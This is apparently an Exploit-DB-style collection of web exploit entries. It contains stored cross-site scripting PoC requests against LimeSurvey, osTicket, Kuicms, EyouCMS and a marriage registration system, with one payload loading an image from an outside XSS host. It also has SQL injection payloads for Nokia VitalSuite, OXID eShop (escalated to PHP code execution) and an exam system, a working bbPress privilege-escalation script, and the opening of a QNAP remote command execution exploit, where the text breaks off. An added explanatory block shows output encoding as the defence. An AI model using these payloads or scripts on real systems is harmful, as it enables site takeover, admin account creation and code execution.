# Date: 2020-05-26
# Exploit Author: that faceless coder(Inveteck Global)
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: Online Marriage Registration System 1.0 - Stored Cross-Site Scripting
# Tested on: MAC OS MOJAVE v 10.14.6
# CVE : N/A

The Online Marriage Registration System suffers from multiple stored cross-site scripting vulnerabilities:

if(isset($_POST['submit']))
{
    $nofhusband=$_POST['nofhusband'];
    $hreligion=$_POST['hreligion'];
    $haddress=$_POST['haddress'];
    $hstate=$_POST['hstate'];
    $nofwife=$_POST['nofwife'];
    $wreligion=$_POST['wreligion'];
    $waddress=$_POST['waddress'];
    $wstate=$_POST['wstate'];
    $witnessnamef=$_POST['witnessnamef'];
    $waddressfirst=$_POST['waddressfirst'];
    $witnessnames=$_POST['witnessnames'];
    $waddresssec=$_POST['waddresssec'];
    $witnessnamet=$_POST['witnessnamet'];
    $waddressthird=$_POST['waddressthird'];
    $sql="insert into tblregistration(RegistrationNumber,UserID,DateofMarriage,HusbandName,HusImage,HusbandReligion,Husbanddob,HusbandSBM,HusbandAdd,HusbandZipcode,HusbandState,HusbandAdharno,WifeName,WifeImage,WifeReligion,Wifedob,WifeSBM,WifeAdd,WifeZipcode,WifeState,WifeAdharNo,WitnessNamefirst,WitnessAddressFirst,WitnessNamesec,WitnessAddresssec,WitnessNamethird,WitnessAddressthird)values(:regnumber,:uid,:dom,:nofhusband,:husimg,:hreligion,:hdob,:hsbmarriage,:haddress,:hzipcode,:hstate,:hadharno,:nofwife,:wifeimg,:wreligion,:wdob,:wsbmarriage,:waddress,:wzipcode,:wstate,:wadharno,:witnessnamef,:waddressfirst,:witnessnames,:waddresssec,:witnessnamet,:waddressthird)";
    $query=$dbh->prepare($sql);
    $query->bindParam(':nofhusband',$nofhusband,PDO::PARAM_STR);
    $query->bindParam(':hreligion',$hreligion,PDO::PARAM_STR);
    $query->bindParam(':hdob',$hdob,PDO::PARAM_STR);
    $query->bindParam(':hsbmarriage',$hsbmarriage,PDO::PARAM_STR);
    $query->bindParam(':haddress',$haddress,PDO::PARAM_STR);
    $query->bindParam(':hzipcode',$hzipcode,PDO::PARAM_STR);
    $query->bindParam(':hstate',$hstate,PDO::PARAM_STR);
    $query->bindParam(':hadharno',$hadharno,PDO::PARAM_STR);
    $query->bindParam(':nofwife',$nofwife,PDO::PARAM_STR);
    $query->bindParam(':wifeimg',$wifeimg,PDO::PARAM_STR);
    $query->bindParam(':wreligion',$wreligion,PDO::PARAM_STR);
    $query->bindParam(':wdob',$wdob,PDO::PARAM_STR);
    $query->bindParam(':wsbmarriage',$wsbmarriage,PDO::PARAM_STR);
    $query->bindParam(':waddress',$waddress,PDO::PARAM_STR);
    $query->bindParam(':wzipcode',$wzipcode,PDO::PARAM_STR);
    $query->bindParam(':wstate',$wstate,PDO::PARAM_STR);
    $query->bindParam(':wadharno',$wadharno,PDO::PARAM_STR);
    $query->bindParam(':witnessnamef',$witnessnamef,PDO::PARAM_STR);
    $query->bindParam(':waddressfirst',$waddressfirst,PDO::PARAM_STR);
    $query->bindParam(':witnessnames',$witnessnames,PDO::PARAM_STR);
    $query->bindParam(':waddresssec',$waddresssec,PDO::PARAM_STR);
    $query->bindParam(':witnessnamet',$witnessnamet,PDO::PARAM_STR);
    $query->bindParam(':waddressthird',$waddressthird,PDO::PARAM_STR);
    $query->execute();
    $LastInsertId=$dbh->lastInsertId();
    if ($LastInsertId>0)
    {
        echo '<script>alert("Registration form has been filled successfully.")</script>';
    }
    else
    {
        echo '<script>alert("Something Went Wrong. Please try again")</script>';
    }
}

The values of the parameters listed above are written to the database unmodified. The prepared statement with bound parameters prevents SQL injection, but it does nothing for the HTML context: when the application later fetches these values and prints them, no output encoding is applied, so the stored payload executes in the browser of anyone who views the record.
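Added example, not code from the Online Marriage Registration System, LimeSurvey or osTicket: the point the snippet above makes is that parameterized storage and output encoding are separate defences. The same class of bug, a stored value rendered back into an admin page without HTML encoding, is what the LimeSurvey and osTicket advisories further down this page describe with their `<img src=/ onerror=alert(1)>` payloads. The sqlite3 schema, the parameterized insert and the two renderers are constructed for the example; the payload is the one used in those advisories.

```python
import html
import sqlite3


def open_db():
    # Constructed schema with two of the columns from the snippet above
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblregistration (HusbandName TEXT, WifeName TEXT)")
    return conn


def store_registration(conn, husband_name, wife_name):
    # Parameterized insert, the sqlite3 counterpart of PDO bindParam(): the payload is stored
    # verbatim but cannot change the SQL, so this is not an injection
    conn.execute("INSERT INTO tblregistration (HusbandName, WifeName) VALUES (?, ?)",
                 (husband_name, wife_name))
    conn.commit()


def render_unsafe(conn):
    # What the vulnerable application does: fetch the stored values and print them as-is
    rows = conn.execute("SELECT HusbandName, WifeName FROM tblregistration").fetchall()
    return "".join("<tr><td>%s</td><td>%s</td></tr>" % (h, w) for h, w in rows)


def render_safe(conn):
    # Encode for the context the value lands in; html.escape() covers an HTML text node
    # (attribute values and JavaScript contexts need their own encoding)
    rows = conn.execute("SELECT HusbandName, WifeName FROM tblregistration").fetchall()
    return "".join("<tr><td>%s</td><td>%s</td></tr>" % (html.escape(h), html.escape(w)) for h, w in rows)


def demo():
    conn = open_db()
    payload = "<img src=/ onerror=alert(1)>"   # same payload as the advisories on this page
    store_registration(conn, payload, "Jane")
    return {"unsafe": render_unsafe(conn), "safe": render_safe(conn)}


if __name__ == "__main__":
    out = demo()
    print("unsafe:", out["unsafe"])
    print("safe:  ", out["safe"])
```

In the unsafe rendering the stored `<img ...>` is live markup and the onerror handler runs for every viewer; in the safe rendering the browser shows the literal text. Bound parameters on the way in never changed the byte sequence that comes back out, which is why the PoC requests on this page need no SQL at all.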
-
LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting
# Exploit Title: LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting
# Date: 05/26/2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.limesurvey.org
# Version: LimeSurvey 4.1.11+200316
# Tested on: Ubuntu 18.04.4
# Patch Link: https://github.com/LimeSurvey/LimeSurvey/commit/2aada33c76efbbc35d33c149ac02b1dc16a81f62

# Vulnerability Details
Description : A stored cross-site scripting vulnerability exists within the "Permission Roles" functionality of the LimeSurvey administration panel.
Vulnerable Parameters : Permissiontemplates[name], Permissiontemplates[description]

# POC
# Exploit Details : The following request will create a permission role with an XSS payload as the role name and description.

POST /limesurvey/index.php/admin/roles/sa/applyedit HTTP/1.1
Host: TARGET
Content-Length: 443
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://TARGET
Referer: http://TARGET/limesurvey/index.php/admin/roles
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: YII_CSRF_TOKEN=RWc3emx-NVhlfm1xamJhRkVSWGlkc1lRfmR5U0RRalYzu7h7NfgUoNTY6kMmTkPkB3J0_IsbOQQEMfsWGmt0Pg%3D%3D; LS-ERXSBPYJOOGIGFYW=m4qshhf7m76ifsm6k0v1vq084h
Connection: close

YII_CSRF_TOKEN=RWc3emx-NVhlfm1xamJhRkVSWGlkc1lRfmR5U0RRalYzu7h7NfgUoNTY6kMmTkPkB3J0_IsbOQQEMfsWGmt0Pg%3D%3D&Permissiontemplates%5Bptid%5D=&Permissiontemplates%5Bname%5D=%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E&Permissiontemplates%5Bdescription%5D=%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E&Permissiontemplates%5Brenewed_last%5D=2020-03-31+17%3A51%3A02&Permissiontemplates%5Bcreated_at%5D=2020-03-31+17%3A51%3A02&Permissiontemplates%5Bcreated_by%5D=1
-
osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting
# Exploit Title: osTicket 1.14.1 - 'Ticket Queue' Persistent Cross-Site Scripting
# Date: 2020-05-26
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://osticket.com
# Patch Link: https://github.com/osTicket/osTicket/commit/6c724ea3fe352d10d457d334dc054ef81917fde1
# Version: osTicket 1.14.1
# Tested on: CentOS 7 (1908)

# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists within the 'Ticket Queue' functionality of osTicket.
# Vulnerable Parameter : queue-name

# POC
# Exploit Details : The following request will create a ticket queue with an XSS payload as the queue name.

POST /os-ticket/scp/queues.php? HTTP/1.1
Host: TARGET
Content-Length: 4491
Cache-Control: max-age=0
Origin: http://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://TARGET/os-ticket/scp/queues.php?
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: OSTSESSID=0c1ssokv9npgmlolue4utj3l81
Connection: close

__CSRFToken__=849ba29024f9d9a894b82fafe29437ace2edc4fa&do=create&a=add&id=&queue-name=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&parent_id=0&fields%5B%5D=status__id&fields%5B%5D=status__state&fields%5B%5D=dept_id&fields%5B%5D=assignee&fields%5B%5D=topic_id&fields%5B%5D=created&fields%5B%5D=est_duedate&fields%5B%5D=duedate&250f895b1cb39a=&_field-checkboxes%5B%5D=1545030345&21128ea1697b9a%5B%5D=includes&c88a27abe7cfab%5B%5D=1&8c6a793c80594e%5B%5D=includes&27ca5f383385cb%5B%5D=includes&82094a76afc304%5B%5D=assigned&85d9edefffa2af%5B%5D=set&a504e6f17eb29c%5B%5D=set&0cc4d080a6f9c7=&3bf29b1e29f88a=&cdf4550c8c6152=&6fd24fee5b5572=&fc1676be53debd=&8097e50092c904=&6691443ad8db48%5B%5D=&a34b4283149a9c=&14e270255589aa%5B%5D=d&f5c5cacb5af509=&197e4e922ff97d%5B%5D=d&046798c3e2934b=&35fedfb3380450%5B%5D=d&0358d35fd35b18=&6e8cc954821ab8%5B%5D=d&e8d808c9daa716%5B%5D=set&ba9c3701fead0c=&d5eed7d2b6f6d6=&42861e6193e58b=&5c39f4b522d7bc=&2008591c98253e=&d37db1b3627ff7=&24fb32de6f1bb7%5B%5D=&6759a92723004c=&bad7322c569428%5B%5D=d&ed195f6bb72ac4=&dded6ab7ae5f7d%5B%5D=d&2f075fa6f1d982=&608f0a963cf3ee%5B%5D=d&1a29ab5444d543=&df9d61f18b866b%5B%5D=d&d72deaa7c372fc%5B%5D=set&76bf3342e88075=&7a259ed4ddda1b=&bb46d89a671337=&4a459564d07f4d=&8f724bccb10aa8=&cb91e9d8492749=&5b783534587f6a%5B%5D=&68dc79a3890bef=&1f25af8e5603df%5B%5D=d&28959e91fd9838=&204683549219a5%5B%5D=d&0a68d064cd567a=&d4b3a0b1aea1b8%5B%5D=d&90c9e78164a9d4=&e4b53638ab9b55%5B%5D=d&new-field=&filter=&sort_id=&columns%5B1%5D%5Bcolumn_id%5D=1&columns%5B1%5D%5Bheading%5D=Number&columns%5B1%5D%5Bwidth%5D=85&columns%5B1%5D%5Bsortable%5D=on&columns%5B2%5D%5Bcolumn_id%5D=2&columns%5B2%5D%5Bheading%5D=Created&columns%5B2%5D%5Bwidth%5D=120&columns%5B2%5D%5Bsortable%5D=on&columns%5B3%5D%5Bcolumn_id%5D=3&columns%5B3%5D%5Bheading%5D=Subject&columns%5B3%5D%5Bwidth%5D=250&columns%5B3%5D%5Bsortable%5D=on&columns%5B4%5D%5Bcolumn_id%5D=4&columns%5B4%5D%5Bheading%5D=From&columns%5B4%5D%5Bwidth%5D=150&columns%5B4%5D%5Bsortable%5D=on&columns%5B5%5D%5Bcolumn_id%5D=5&columns%5B5%5D%5Bheading%5D=Priority&columns%5B5%5D%5Bwidth%5D=120&columns%5B5%5D%5Bsortable%5D=on&columns%5B8%5D%5Bcolumn_id%5D=8&columns%5B8%5D%5Bheading%5D=Assignee&columns%5B8%5D%5Bwidth%5D=100&columns%5B8%5D%5Bsortable%5D=on&exports%5Bnumber%5D%5Bname%5D=Ticket+Number&exports%5Bnumber%5D%5Bheading%5D=Ticket+Number&exports%5Bcreated%5D%5Bname%5D=Date+Created&exports%5Bcreated%5D%5Bheading%5D=Date+Created&exports%5Bcdata__subject%5D%5Bname%5D=Subject&exports%5Bcdata__subject%5D%5Bheading%5D=Subject&exports%5Buser__name%5D%5Bname%5D=From&exports%5Buser__name%5D%5Bheading%5D=From&exports%5Buser__emails__address%5D%5Bname%5D=From+Email&exports%5Buser__emails__address%5D%5Bheading%5D=From+Email&exports%5Bcdata__priority%5D%5Bname%5D=Priority&exports%5Bcdata__priority%5D%5Bheading%5D=Priority&exports%5Bdept_id%5D%5Bname%5D=Department&exports%5Bdept_id%5D%5Bheading%5D=Department&exports%5Btopic_id%5D%5Bname%5D=Help+Topic&exports%5Btopic_id%5D%5Bheading%5D=Help+Topic&exports%5Bsource%5D%5Bname%5D=Source&exports%5Bsource%5D%5Bheading%5D=Source&exports%5Bstatus__id%5D%5Bname%5D=Current+Status&exports%5Bstatus__id%5D%5Bheading%5D=Current+Status&exports%5Blastupdate%5D%5Bname%5D=Last+Updated&exports%5Blastupdate%5D%5Bheading%5D=Last+Updated&exports%5Best_duedate%5D%5Bname%5D=SLA+Due+Date&exports%5Best_duedate%5D%5Bheading%5D=SLA+Due+Date&exports%5Bduedate%5D%5Bname%5D=Due+Date&exports%5Bduedate%5D%5Bheading%5D=Due+Date&exports%5Bclosed%5D%5Bname%5D=Closed+Date&exports%5Bclosed%5D%5Bheading%5D=Closed+Date&exports%5Bisoverdue%5D%5Bname%5D=Overdue&exports%5Bisoverdue%5D%5Bheading%5D=Overdue&exports%5Bmerged%5D%5Bname%5D=Merged&exports%5Bmerged%5D%5Bheading%5D=Merged&exports%5Blinked%5D%5Bname%5D=Linked&exports%5Blinked%5D%5Bheading%5D=Linked&exports%5Bisanswered%5D%5Bname%5D=Answered&exports%5Bisanswered%5D%5Bheading%5D=Answered&exports%5Bstaff_id%5D%5Bname%5D=Agent+Assigned&exports%5Bstaff_id%5D%5Bheading%5D=Agent+Assigned&exports%5Bteam_id%5D%5Bname%5D=Team+Assigned&exports%5Bteam_id%5D%5Bheading%5D=Team+Assigned&exports%5Bthread_count%5D%5Bname%5D=Thread+Count&exports%5Bthread_count%5D%5Bheading%5D=Thread+Count&exports%5Breopen_count%5D%5Bname%5D=Reopen+Count&exports%5Breopen_count%5D%5Bheading%5D=Reopen+Count&exports%5Battachment_count%5D%5Bname%5D=Attachment+Count&exports%5Battachment_count%5D%5Bheading%5D=Attachment+Count&exports%5Btask_count%5D%5Bname%5D=Task+Count&exports%5Btask_count%5D%5Bheading%5D=Task+Count&new-field=&submit=Create
-
osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting
# Exploit Title: osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting
# Date: 2020-06-26
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://osticket.com
# Patch Link: https://github.com/osTicket/osTicket/commit/d54cca0b265128f119b6c398575175cb10cf1754
# Version: osTicket 1.14.1
# Tested on: CentOS 7 (1908)

# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists within the 'Saved Searches' functionality of osTicket.
# Vulnerable Parameter : queue-name

# POC
# Exploit Details : The following request will create a personal queue with an XSS payload as the queue name.

POST /os-ticket/scp/ajax.php/tickets/search/save HTTP/1.1
Host: TARGET
Content-Length: 2407
Accept: */*
X-CSRFToken: 4c0cfe1d90018bd1521d4c6236ff9e695695feb4
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://TARGET
Referer: http://TARGET/os-ticket/scp/tickets.php?queue=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: OSTSESSID=1bgg4patkgh75amtk7i40ijg0r
Connection: close

id=&parent_id=1&a=search&fields%5B%5D=status__id&fields%5B%5D=status__state&fields%5B%5D=dept_id&fields%5B%5D=assignee&fields%5B%5D=topic_id&fields%5B%5D=created&fields%5B%5D=est_duedate&fields%5B%5D=duedate&6e726d7c5d6739=&bb1ed81f8d0d5b%5B%5D=includes&_field-checkboxes%5B%5D=1248906005&5a14e85b6ad733%5B%5D=includes&64e882412ea044%5B%5D=open&3387e761db951b%5B%5D=includes&fae2c0ad94312b%5B%5D=assigned&8b25367208a92c%5B%5D=set&4548de579d61b2%5B%5D=set&6b0942ccd352fb=&7508c012d200c3=&306afd69a94f37=&2cb42ece11fe18=&19178654ae1019=&5446ab541e9cbe=&643b959c89a939%5B%5D=&c41f997e500bde=&594ae09ae9b23b%5B%5D=d&f67d51537548ed=&782f1a2f64f6b8%5B%5D=d&bf54f7c4c9cd85=&d53f6d5fa7c165%5B%5D=d&dda4c3a3983e11=&3edd5b8c560cb0%5B%5D=d&5d54602e649846%5B%5D=set&eee448b2f6bd17=&c66cc8358c9461=&1c2df7cbee73a8=&2b12655056e4bc=&559ec54e5d4f4d=&4d653aa4c6fbfe=&fde625f821b1cc%5B%5D=&1d3ec7f5059a1e=&fd5c9e3beeb866%5B%5D=d&f9d70eb7b32ef7=&4e236864d83b1b%5B%5D=d&6ad52c19a211f8=&17d6ed14edc097%5B%5D=d&1ed604fc8adb80=&29187a3432e23b%5B%5D=d&6a2107ce7bc3ad%5B%5D=set&968398f30ae34d=&1bd5961978d6f5=&aaead453b69fd8=&b2473437455577=&2d7ade2446d29d=&7248fe732f4071=&9d29b71605e863%5B%5D=&606b27533da5da=&042dae34bbf5f6%5B%5D=d&69e461f3457905=&9cb82bf3b3b655%5B%5D=d&472a67a44bfd63=&387c6a57919904%5B%5D=d&b13a3742f14f6a=&285dc00ac07d30%5B%5D=d&new-field=&inherit-columns=on&columns%5B1%5D%5Bcolumn_id%5D=1&columns%5B1%5D%5Bheading%5D=Ticket&columns%5B1%5D%5Bwidth%5D=100&columns%5B1%5D%5Bname%5D=Ticket+%23&columns%5B1%5D%5Bsortable%5D=on&columns%5B10%5D%5Bcolumn_id%5D=10&columns%5B10%5D%5Bheading%5D=Last+Updated&columns%5B10%5D%5Bwidth%5D=150&columns%5B10%5D%5Bname%5D=Last+Updated&columns%5B10%5D%5Bsortable%5D=on&columns%5B3%5D%5Bcolumn_id%5D=3&columns%5B3%5D%5Bheading%5D=Subject&columns%5B3%5D%5Bwidth%5D=300&columns%5B3%5D%5Bname%5D=Subject&columns%5B3%5D%5Bsortable%5D=on&columns%5B4%5D%5Bcolumn_id%5D=4&columns%5B4%5D%5Bheading%5D=From&columns%5B4%5D%5Bwidth%5D=185&columns%5B4%5D%5Bname%5D=User+Name&column
s%5B4%5D%5Bsortable%5D=on&columns%5B5%5D%5Bcolumn_id%5D=5&columns%5B5%5D%5Bheading%5D=Priority&columns%5B5%5D%5Bwidth%5D=85&columns%5B5%5D%5Bname%5D=Priority&columns%5B5%5D%5Bsortable%5D=on&columns%5B8%5D%5Bcolumn_id%5D=8&columns%5B8%5D%5Bheading%5D=Assigned+To&columns%5B8%5D%5Bwidth%5D=160&columns%5B8%5D%5Bname%5D=Assignee&columns%5B8%5D%5Bsortable%5D=on&queue-name=%3Cimg+src%3D%2F+onerror%3Dalert(1)%3E
-
Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting
# Exploit Title: Kuicms Php EE 2.0 - Persistent Cross-Site Scripting
# Date: 2020-05-27
# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
# Vendor Homepage: https://kuicms.com
# Software Link: https://kuicms.com/kuicms.zip
# Version: Kuicms Php EE 2.0
# Tested on: Windows
# CVE : N/A

Vulnerable Request:

POST /web/?c=bbs&a=reply&id=1 HTTP/1.1
Host: 172.16.166.137
Content-Length: 56
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.16.166.137
Referer: http://172.16.166.137/web/?m=bbsshow&id=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=vpj3jduhoqlfieqhcnlilck2s6
Connection: close

content=</div>test<img src=//xsshs.cn/8jhh/xss.jpg><div>
-
NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection
# Exploit Title: NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection
# Exploit Author: Berk Dusunur
# Google Dork: N/A
# Type: Web App
# Date: 2020-05-28
# Vendor Homepage: https://www.nokia.com
# Software Link: https://www.nokia.com/networks/products/vitalsuite-performance-management-software/
# Affected Version: v2020
# Tested on: MacosX
# CVE : N/A

# PoC

POST /cgi-bin/vsloginadmin.exe HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 84
Host: berklocal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Password=test&Submit=%20Login%20&UserName=SQL-INJECTION&mode=1

Example time-based payload:

UserName=test'; waitfor delay '00:00:10' --
-
OXID eShop 6.3.4 - 'sorting' SQL Injection
# Exploit Title: OXID eShop 6.3.4 - 'sorting' SQL Injection
# Date: 2019-07-29
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.oxid-esales.com/
# Software Link: https://github.com/OXID-eSales/oxideshop_ce
# Version: Versions 6.x (prior to 6.3.4)
# Tested on: https://github.com/vsplate/dcenvs/tree/master/oxideshop_ce/6.3.3/dc
# CVE:

1. Click on any product item in the web page.

```bash
e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html
```

2. Add the `sorting` parameter after the URL of the item detail page (this inserts PHP code into the database via SQL injection).

```bash
e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|;insert into oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION) VALUES(0x313233343536,0x76756c6e73707964656d6f, 0x00, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 0x434d53464f4c4445525f55534552494e464f, 0x00);%23
```

3. Accessing the following link triggers PHP code execution and will display the PHPINFO page if exploited successfully.

```bash
http://***.vsgo.cloud/source/index.php?cl=content&oxloadid=vulnspydemo
```

Ref:
* https://www.vulnspy.com/en-oxid-eshop-6.x-sqli-to-rce/
* https://blog.ripstech.com/2019/oxid-esales-shop-software/
* https://bugs.oxid-esales.com/view.php?id=7002
-
Online-Exam-System 2015 - 'fid' SQL Injection
# Exploit Title: Online-Exam-System 2015 - 'fid' SQL Injection
# Exploit Author: Berk Dusunur
# Google Dork: N/A
# Type: Web App
# Date: 2020-05-28
# Vendor Homepage: https://github.com/sunnygkp10/
# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git
# Affected Version: 2015
# Tested on: MacosX
# CVE : N/A

# PoC

Affected code:

```php
<?php
if(@$_GET['fid'])
{
    echo '<br />';
    $id=@$_GET['fid'];
    $result = mysqli_query($con,"SELECT * FROM feedback WHERE id='$id' ") or die('Error');
```

http://berklocal/dash.php?fid=SQL-INJECTION
-
EyouCMS 1.4.6 - Persistent Cross-Site Scripting
# Exploit Title: EyouCMS 1.4.6 - Persistent Cross-Site Scripting
# Date: 2020-05-28
# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
# Vendor Homepage: https://eyoucms.com
# Software Link: https://qiniu.eyoucms.com/EyouCMS-V1.4.6-UTF8-SP2.zip
# Version: EyouCMS V1.4.6
# Tested on: Windows
# CVE : N/A

Vulnerable Request:

POST /EyouCMS/index.php?m=user&c=UsersRelease&a=article_add HTTP/1.1
Host: 192.168.31.244
Content-Length: 131
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.31.244
Referer: http://192.168.31.244/EyouCMS/index.php?m=user&c=UsersRelease&a=article_add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: users_id=4; home_lang=cn; admin_lang=cn; PHPSESSID=mahba3d6smn8d400pedi9n9gl0; referurl=http%3A%2F%2F192.168.31.244%2FEyouCMS%2Findex.php
Connection: close

title=test&typeid=9&tags=&litpic_inpiut=&addonFieldExt%5Bcontent%5D=111<img src=1 onerror=alert(document.cookie)>&__token__=b90d4bf2356b81f65284238857b91ada

Wang Xinfeng, Technology Management Department, China Banking and Insurance Information Technology Management Co., Ltd.
-
WordPress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation
```python
# Exploit Title: Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation
# Date: 2020-05-29
# Exploit Author: Raphael Karger
# Software Link: https://codex.bbpress.org/releases/
# Version: BBPress < 2.5
# CVE: CVE-2020-13693

import argparse
import requests
import bs4
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

useragent = {"User-Agent" : "This is a real browser i swear"}

def grab_nonce_login_page(url):
    try:
        login_page_request = requests.get(url, verify=False, timeout=10, headers=useragent)
        soup = bs4.BeautifulSoup(login_page_request.text, "lxml")
        action = soup.find("form", class_="bbp-login-form")
        wp_login_page = action.get("action")
        wp_nonce = action.find("input", id="_wpnonce").get("value")
        return (wp_nonce, wp_login_page)
    except Exception as nonce_error:
        print("[-] Nonce Error: '{}'".format(nonce_error))
        return False

def exploit(url, username, password, email):
    info = grab_nonce_login_page(url)
    if info:
        nonce = info[0]
        login_page = info[1]
        try:
            return requests.post(login_page, data={
                "user_login" : username,
                "user_pass" : password,
                "user_email" : email,
                "user-submit" : "",
                "user-cookie" : "1",
                "_wpnonce" : nonce,
                "bbp-forums-role" : "bbp_keymaster"
            }, allow_redirects=False, verify=False, timeout=10, headers=useragent)
        except Exception as e:
            print("[-] Error Making Signup Post Request: '{}'".format(e))
            return False

if __name__ == "__main__":
    exit("asdasd")
    parser = argparse.ArgumentParser()
    parser.add_argument("-n", "--username", dest="username", help="Username of Newly Created Keymaster", default="raphaelrocks")
    parser.add_argument("-p", "--password", dest="password", help="Password of Newly Created Keymaster", default="raphael123")
    parser.add_argument("-e", "--email", dest="email", help="Email of Newly Created Keymaster", default="[email protected]")
    parser.add_argument("-u", "--url", dest="url", help="URL of Page With Exposed Register Page.", required=True)
    args = parser.parse_args()
    site_exploit = exploit(args.url, args.username, args.password, args.email)
    if site_exploit and site_exploit.status_code == 302:
        exit("[+] Exploit Successful, Use Username: '{}' and Password: '{}'".format(args.username, args.password))
    print("[-] Exploit Failed")
```
-
QNAP QTS and Photo Station 6.0.3 - Remote Command Execution
```python
# Exploit Title: QNAP QTS and Photo Station 6.0.3 - Remote Command Execution
# Exploit Author: Yunus YILDIRIM (Th3Gundy)
# Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Date: 2020-05-28
# Vendor Homepage: https://www.qnap.com
# Version: QTS < 4.4.1 | Photo Station < 6.0.3
# CVE: CVE-2019-7192, CVE-2019-7193, CVE-2019-7194, CVE-2019-7195
# References: https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit
# References: https://medium.com/@cycraft_corp/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
# References: https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
######################################################################
######################################################################
#!/usr/bin/python3

__author__ = "Yunus YILDIRIM (@Th3Gundy)"
__version__ = "0.1"

import requests
import re, sys

# hide ssl error
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def get_banner():
    # ASCII-art banner (flattened by extraction; kept as it survived)
    print("""\033[91m
█████ ███▄ █ ▄▄▄ ██▓███ ▒██▓ ██▒ ██ ▀█ █ ▒████▄ ▓██░ ██▒ ▒██▒ ██░▓██ ▀█ ██▒▒██ ▀█▄ ▓██░ ██▓▒ ░██ █▀ ░▓██▒ ▐▌██▒░██▄▄▄▄██ ▒██▄█▓▒ ▒ ░▒███▒█▄ ▒██░ ▓██░ ▓█ ▓██▒▒██▒ ░ ░ ░░ ▒▒░ ▒ ░ ▒░ ▒ ▒ ▒▒ ▓▒█░▒▓▒░ ░ ░ ░ ▒░ ░ ░ ░░ ░ ▒░ ▒ ▒▒ ░░▒ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░
\033[0m
\033[94m {0} \033[0m
""".format(__author__))

def get_file_content(file):
    post_data = {'album': album_id, 'a': 'caption', 'ac': access_code, 'f': 'UMGObv', 'filename': file}
